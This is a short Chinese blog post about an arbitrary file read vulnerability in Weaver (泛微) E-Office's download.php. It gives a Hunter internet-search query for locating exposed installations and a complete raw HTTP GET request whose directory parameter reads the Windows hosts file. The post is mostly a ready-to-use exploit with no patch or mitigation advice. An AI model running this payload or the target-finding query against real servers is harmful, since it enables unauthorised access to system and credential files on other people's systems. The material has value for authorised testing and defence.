Babing
Published on 2024-08-30 / 2 Visits
0
0

F8-3泛微-E-Office-任意文件读取

F8-3泛微-E-Office-任意文件读取

漏洞描述:

泛微E-Office是泛微旗下的一款标准协同移动办公平台。泛微E-Office download.php存在任意文件读取漏洞。

网站图片:

image.webp

网络测绘:

Hunter 语法:

  • hunterapp.name=“泛微 e-office OA”

漏洞复现:

payload:

GET /general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\\Windows\\System32\\drivers\\etc\\ HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

效果图:
image.webp


Comment